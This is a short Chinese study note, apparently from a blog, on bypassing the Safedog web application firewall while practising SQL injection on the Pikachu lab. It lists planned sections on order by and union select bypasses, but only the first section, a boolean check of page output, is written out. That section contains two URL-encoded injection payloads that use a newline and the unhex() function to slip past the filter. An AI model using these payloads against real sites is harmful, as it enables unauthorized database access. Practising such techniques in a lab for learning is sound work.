记录waf绕过

学习过程中并记录了这篇笔记

 

目录

1)判断回显

2)order by绕过 

3)union select绕过


 

 

靶场使用的是 pikachu

安全狗版本:4.0.30256

 

1)判断回显

拦截了and不能连续使用

记录waf绕过_第1张图片

 

 

方法1,unhex()函数判断

vince%27and%0aunhex(100)!=100%23&submit=1    回显正常
vince%27and%0aunhex(100)!=0%23&submit=1    回显不正常

 

你可能感兴趣的:(waf绕过,安全)